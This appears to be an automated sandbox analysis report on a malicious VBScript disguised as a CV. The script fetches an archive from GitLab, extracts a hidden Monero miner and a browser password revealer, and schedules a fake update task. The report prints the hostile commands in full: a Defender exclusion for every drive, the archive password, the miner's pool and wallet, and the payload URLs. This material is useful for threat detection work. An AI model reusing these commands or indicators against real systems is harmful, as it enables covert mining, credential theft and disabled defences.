                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B165A1 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,13_2_00B165A1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
                    Source: wscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: wscript.exe, 00000005.00000003.726622211.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.728550362.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, mservice.exe, 00000015.00000002.864986028.0000023B282F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B4A7BC GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs,13_2_00B4A7BC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\System32\wscript.exeFile created: 7zr[1].exe.5.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 49.12.202.237 443Jump to behavior
                    Source: C:\Windows\System32\wscript.exeDomain query: www.7-zip.org
                    Source: C:\Windows\System32\wscript.exeDomain query: gitlab.com
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-titleJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7zJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xmlJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologoJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-titleJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                    Source: conhost.exe, 00000016.00000002.865240685.000001F7AE100000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                    Source: conhost.exe, 00000016.00000002.865240685.000001F7AE100000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: conhost.exe, 00000016.00000002.865240685.000001F7AE100000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: conhost.exe, 00000016.00000002.865240685.000001F7AE100000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B1A540 GetSystemTimeAsFileTime,13_2_00B1A540

                    Stealing of Sensitive Information

                    barindex
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: 13.3.7g.exe.2fb7600.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7g.exe PID: 2912, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\WindowsUpdate\ps.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts311
                    Windows Management Instrumentation                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    Disable or Modify Tools                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts621
                    Scripting                    		1
                    Scheduled Task/Job                    		1
                    Windows Service                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory3
                    File and Directory Discovery                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		621
                    Scripting                    		Security Account Manager24
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Exploitation for Client Execution                    		Logon Script (Mac)1
                    Scheduled Task/Job                    		21
                    Obfuscated Files or Information                    		NTDS511
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer13
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud Accounts1
                    Command and Scripting Interpreter                    		Network Logon Script1
                    Registry Run Keys / Startup Folder                    		11
                    Software Packing                    		LSA Secrets2
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable Media1
                    Scheduled Task/Job                    		Rc.commonRc.common1
                    File Deletion                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote Services1
                    PowerShell                    		Startup ItemsStartup Items111
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)112
                    Process Injection                    		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1285225 Sample: curriculum_vitae-copie_(1).vbs Startdate: 03/08/2023 Architecture: WINDOWS Score: 100 86 Sigma detected: Register Wscript In Run Key 2->86 88 Sigma detected: Xmrig 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 10 other signatures 2->92 8 wscript.exe 1 2->8         started        11 wscript.exe 2 2->11         started        13 wscript.exe 1 2->13         started        15 2 other processes 2->15 process3 signatures4 108 System process connects to network (likely due to code injection or exploit) 8->108 110 Benign windows process drops PE files 8->110 112 VBScript performs obfuscated calls to suspicious functions 8->112 116 6 other signatures 8->116 17 wscript.exe 1 19 8->17         started        114 Wscript called in batch mode (surpress errors) 11->114 22 mservice.exe 1 11->22         started        24 wscript.exe 1 11->24         started        26 wscript.exe 13->26         started        28 wscript.exe 15->28         started        30 wscript.exe 15->30         started        process5 dnsIp6 68 www.7-zip.org 49.12.202.237, 443, 49699 HETZNER-ASDE Germany 17->68 70 gitlab.com 172.65.251.78, 443, 49700 CLOUDFLARENETUS United States 17->70 62 C:\Users\user\AppData\Local\...\7zr[1].exe, PE32 17->62 dropped 64 C:\Users\Public\7g.exe, PE32 17->64 dropped 66 C:\Users\Public\gmail.7z, 7-zip 17->66 dropped 94 System process connects to network (likely due to code injection or exploit) 17->94 96 Wscript starts Powershell (via cmd or directly) 17->96 98 Deletes itself after installation 17->98 106 2 other signatures 17->106 32 7g.exe 10 17->32         started        36 cmd.exe 1 17->36         started        38 cmd.exe 1 17->38         started        40 wscript.exe 1 17->40         started        72 141.94.96.144, 443, 49701 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 22->72 100 Multi AV Scanner detection for dropped file 22->100 102 Query firmware table information (likely to detect VMs) 22->102 104 Machine Learning detection for dropped file 22->104 42 conhost.exe 22->42         started        file7 signatures8 process9 file10 54 C:\Users\Public\WindowsUpdate\ps.exe, PE32 32->54 dropped 56 C:\Users\Public\WindowsUpdate\mservice.exe, PE32+ 32->56 dropped 58 C:\Users\Public\WindowsUpdate\go.exe, PE32 32->58 dropped 60 4 other malicious files 32->60 dropped 74 Potential malicious VBS script found (has network functionality) 32->74 76 Potential evasive VBS script found (sleep loop) 32->76 78 Sample is not signed and drops a device driver 32->78 44 conhost.exe 32->44         started        80 Wscript starts Powershell (via cmd or directly) 36->80 82 Uses schtasks.exe or at.exe to add and modify task schedules 36->82 84 Adds a directory exclusion to Windows Defender 36->84 46 powershell.exe 15 36->46         started        48 conhost.exe 36->48         started        50 conhost.exe 38->50         started        52 schtasks.exe 1 38->52         started        signatures11 process12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    curriculum_vitae-copie_(1).vbs18%ReversingLabsScript-WScript.Downloader.Heuristic
                    curriculum_vitae-copie_(1).vbs20%VirustotalBrowse
                    curriculum_vitae-copie_(1).vbs100%AviraVBS/Dldr.Agent.VPVO

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\WindowsUpdate\mservice.exe100%Joe Sandbox ML
                    C:\Users\Public\WindowsUpdate\ps.exe100%Joe Sandbox ML
                    C:\Users\Public\7g.exe0%ReversingLabs
                    C:\Users\Public\WindowsUpdate\WinRing0x64.sys5%ReversingLabs
                    C:\Users\Public\WindowsUpdate\go.exe29%ReversingLabsWin32.Trojan.Generic
                    C:\Users\Public\WindowsUpdate\mservice.exe83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                    C:\Users\Public\WindowsUpdate\ps.exe81%ReversingLabsWin32.Hacktool.PasswordRevealer
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\7zr[1].exe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://xmrig.com/wizard%s0%URL Reputationsafe
                    http://schemas.microsoft.c0%URL Reputationsafe
                    https://xmrig.com/wizard0%URL Reputationsafe
                    https://xmrig.com/docs/algorithms0%URL Reputationsafe
                    https://www.recaptcha.net/0%URL Reputationsafe
                    https://snowplow.trx.gitlab.net0%Avira URL Cloudsafe
                    https://sentry.gitlab.net0%Avira URL Cloudsafe
                    http://crl.micro60%Avira URL Cloudsafe
                    https://new-sentry.gitlab.net0%Avira URL Cloudsafe
                    https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env0%Avira URL Cloudsafe
                    https://new-sentry.gitlab.net0%VirustotalBrowse
                    https://snowplow.trx.gitlab.net0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    www.7-zip.org
                    		49.12.202.237
                    		truefalse
                      		high
                      gitlab.com
                      		172.65.251.78
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=falsefalse
                          		high
                          https://www.7-zip.org/a/7zr.exefalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseewscript.exe, 00000019.00000002.754546393.00000250582A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000002.771953581.0000026FFEA15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821647912.000001CE3F285000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.7-zip.org/a/7zr.exeAwscript.exe, 00000005.00000002.728323335.000002527005B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723130778.000002527005B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726527500.000002527005B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://gitlab.com/cv6535510/cv/-/raw/mwscript.exe, 00000019.00000002.754502079.0000025057FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://xmrig.com/wizard%s7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://new-sentry.gitlab.netwscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://snowplow.trx.gitlab.netwscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.microsoft.cwscript.exe, 00000011.00000003.726386385.0000024C2F6E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.726313946.0000024C2F6D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.726543417.0000024C2F6FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://xmrig.com/wizard7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.7-zip.org/a/7zr.exe=wscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://gitlab.com/wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726396843.00000252701FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725940545.00000252701F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.728634785.0000025270200000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=falserwscript.exe, 00000005.00000003.678726662.000002527022E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://gitlab.comwscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsewscript.exe, 0000001D.00000002.821669261.000001CE40AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821647912.000001CE3F285000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001D.00000002.821620533.000001CE3F11D000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.13.drfalse
                                            		high
                                            https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=false5wscript.exe, 00000000.00000003.348852456.0000026D0B921000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
